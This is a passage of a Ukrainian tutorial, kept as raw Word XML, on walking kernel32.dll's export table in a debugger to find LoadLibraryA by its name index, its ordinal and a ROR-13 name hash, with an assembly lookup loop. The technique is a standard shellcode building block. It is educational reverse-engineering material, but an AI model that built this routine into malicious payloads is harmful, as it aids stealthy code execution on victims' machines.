          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00852D9D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>в таблиці експорту:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDAC3AC" w14:textId="21B2111F" w:rsidR="00FE30C8" w:rsidRDefault="00D65F5A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4747A8F4" wp14:editId="7868F53D">
            <wp:extent cx="6645910" cy="1986915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2109376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62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81B3" w14:textId="0CE0070C" w:rsidR="00780EBF" w:rsidRDefault="004437E0" w:rsidP="004437E0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Шукана </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7340F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>має порядковий номер 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7340F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00433505">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7340F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00771ACF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, тобто індекс її імені = </w:t>
      </w:r>
      <w:r w:rsidR="00771ACF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0x3c8, </w:t>
      </w:r>
      <w:r w:rsidR="00771ACF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">так як </w:t>
      </w:r>
      <w:r w:rsidR="00841643">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Base = 1</w:t>
      </w:r>
      <w:r w:rsidR="00955E46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6883EC7D" w14:textId="77777777" w:rsidR="00DD1A6A" w:rsidRPr="00841643" w:rsidRDefault="00DD1A6A" w:rsidP="00DD1A6A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ordinal = Name index + Base </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281467BB" w14:textId="77777777" w:rsidR="00DD1A6A" w:rsidRDefault="00DD1A6A" w:rsidP="00DD1A6A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x3c9 = 0x3c8 + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D2906" w14:textId="77777777" w:rsidR="00DD1A6A" w:rsidRPr="0082514A" w:rsidRDefault="00DD1A6A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A6FE0D" w14:textId="30324B5A" w:rsidR="00E47674" w:rsidRPr="00460855" w:rsidRDefault="00E10BE1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2. </w:t>
      </w:r>
      <w:r w:rsidR="003F24AF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AddressOfNames</w:t>
      </w:r>
      <w:r w:rsidR="003F24AF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – це масив, кожний елемент якого</w:t>
      </w:r>
      <w:r w:rsidR="00A80D69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC0DF4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>є</w:t>
      </w:r>
      <w:r w:rsidR="00ED0D8A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006770EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RVA</w:t>
      </w:r>
      <w:r w:rsidR="006770EB" w:rsidRPr="00C77B59">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006770EB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>назви і займає 4 байти.</w:t>
      </w:r>
      <w:r w:rsidR="00961CB2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00761C73">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Знайдемо </w:t>
      </w:r>
      <w:r w:rsidR="00906113">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RVA </w:t>
      </w:r>
      <w:r w:rsidR="00906113">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>назви</w:t>
      </w:r>
      <w:r w:rsidR="00460855">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00460855">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibrary</w:t>
      </w:r>
      <w:r w:rsidR="00460855">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F5A841" w14:textId="524484DA" w:rsidR="000D20A1" w:rsidRPr="000D20A1" w:rsidRDefault="008145D7" w:rsidP="008145D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>dd</w:t>
      </w:r>
      <w:r w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidR="00DE1FE3" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00DE1FE3" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>aa</w:t>
      </w:r>
      <w:r w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidR="00DE1FE3" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46078" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00DE1FE3" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46078" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00196BED" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46078" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="00196BED" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB1EB4" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00E46078" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00E46078" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00771ACF" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00DE1FE3" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00771ACF" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00DE1FE3" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00771ACF" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00CB1EB4" w:rsidRPr="00661011">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C27E1D" w14:textId="2FDB87CE" w:rsidR="005161BB" w:rsidRDefault="00411108" w:rsidP="008145D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BB28C75" wp14:editId="03F6D87B">
            <wp:extent cx="5158500" cy="594360"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="1852871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71664" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="26531"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5161905" cy="59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CE88D" w14:textId="1D2CBCF5" w:rsidR="0004066B" w:rsidRPr="003D237C" w:rsidRDefault="00DD6D85">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D237C">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>da kernel32 + 0x</w:t>
      </w:r>
      <w:r w:rsidRPr="003D237C">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a304f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA56B34" w14:textId="2B8208C2" w:rsidR="009755E9" w:rsidRDefault="005C6C6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3696C16F" wp14:editId="508799B0">
            <wp:extent cx="5161905" cy="428571"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1824581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15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364C" w14:textId="702720C2" w:rsidR="001B5523" w:rsidRDefault="001B5523" w:rsidP="00651606">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Отже, </w:t>
      </w:r>
      <w:r w:rsidR="00A75BAF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>перебираємо адресу за адресою в масиві</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AddressOfNames</w:t>
      </w:r>
      <w:r w:rsidR="00E94ABB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Якщо поточна адреса вказує на </w:t>
      </w:r>
      <w:r w:rsidR="000E67C7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>рядок "</w:t>
      </w:r>
      <w:r w:rsidR="000E67C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r w:rsidR="000E67C7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">", то </w:t>
      </w:r>
      <w:r w:rsidR="00260440">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>запам'ятовуємо індекс.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C02F1F" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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Find name index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DC8A16" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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5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D4107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            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4107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Counter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAA2EF5" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4107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nextName:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD832FC" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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Names]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0328E06A" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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bx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</w:t>
      </w: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D4107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4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* </w:t>
      </w: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5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       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4107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Name RVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52360784" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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dd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Kernel32]     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4107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Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCB37F5" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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Name], </w:t>
      </w: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bx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E9D26" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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idxName], </w:t>
      </w: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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4FB16B" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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1F561E08" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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Name]         </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4107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Hash current name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CAC94F" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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all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Ror13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F99C294" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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mp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ax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iProcName]     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4107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Compare ROR-13 hash with already known value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CA6A4E" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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je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 .endLoop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285CF134" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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109E1A94" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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nc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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6E6C92" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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mp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5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cNames]        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4107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Max num of iterations = NumberOfNames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5347D77B" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D4107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jne</w:t>
      </w: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.nextName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06227D9A" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D410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.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4107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endLoop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74393058" w14:textId="77777777" w:rsidR="00D41074" w:rsidRPr="00D41074" w:rsidRDefault="00D41074" w:rsidP="00D41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D410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D4107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Find ordinal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6191C74C" w14:textId="77777777" w:rsidR="00C77B59" w:rsidRPr="00D41074" w:rsidRDefault="00C77B59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28297045" w14:textId="77777777" w:rsidR="002750F4" w:rsidRPr="00C77B59" w:rsidRDefault="002750F4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E7D961" w14:textId="6219C1CB" w:rsidR="00C16FDD" w:rsidRPr="000A02DF" w:rsidRDefault="00DF2FCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A02DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="000A02DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Пошук </w:t>
      </w:r>
      <w:r w:rsidR="000D1770" w:rsidRPr="000A02DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>порядк</w:t>
      </w:r>
      <w:r w:rsidR="00E835FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidR="000D1770" w:rsidRPr="000A02DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>вого номера</w:t>
      </w:r>
      <w:r w:rsidRPr="000A02DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> LoadLibraryA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F86658C" w14:textId="00FD4D5E" w:rsidR="00581FDA" w:rsidRPr="009827D4" w:rsidRDefault="00086A7B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00086A7B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AddressOfName</w:t>
      </w:r>
      <w:r w:rsidR="00612554">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ordinals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – це масив, кожний елемент якого</w:t>
      </w:r>
      <w:r w:rsidRPr="00086A7B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0057752F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">є </w:t>
      </w:r>
      <w:r w:rsidR="00B72F8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">порядковим номером функції </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">і займає </w:t>
      </w:r>
      <w:r w:rsidR="00B72F8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> байти. Знайдемо </w:t>
      </w:r>
      <w:r w:rsidR="00B83252">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">порядковий </w:t>
      </w:r>
      <w:r w:rsidR="00DC2A84">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">номер </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibrary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFC7D3D" w14:textId="62D84913" w:rsidR="004871A9" w:rsidRPr="00086A7B" w:rsidRDefault="002857B2" w:rsidP="004871A9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00086A7B">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00F60F68" w:rsidRPr="00086A7B">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00086A7B">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> kernel32 + </w:t>
      </w:r>
      <w:r w:rsidR="00B632B6" w:rsidRPr="00086A7B">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9c3b8</w:t>
      </w:r>
      <w:r w:rsidR="00531BA3" w:rsidRPr="00086A7B">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F2CCC" w:rsidRPr="00086A7B">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00D407D5" w:rsidRPr="00086A7B">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve">2 * </w:t>
      </w:r>
      <w:r w:rsidR="006461E8" w:rsidRPr="00086A7B">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3c8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CEE7A5" w14:textId="2C989351" w:rsidR="00151C7F" w:rsidRDefault="007A001B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74586456" wp14:editId="7E0E363E">
            <wp:extent cx="5409524" cy="638095"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="417562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629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03B5" w14:textId="77777777" w:rsidR="00E55437" w:rsidRPr="001E56F1" w:rsidRDefault="00E55437" w:rsidP="00E55437">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ordinal</w:t>
      </w:r>
      <w:r w:rsidRPr="001E56F1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidRPr="001E56F1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="001E56F1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Base</w:t>
      </w:r>
      <w:r w:rsidRPr="001E56F1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329C1FF4" w14:textId="77777777" w:rsidR="00E55437" w:rsidRDefault="00E55437" w:rsidP="00E55437">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
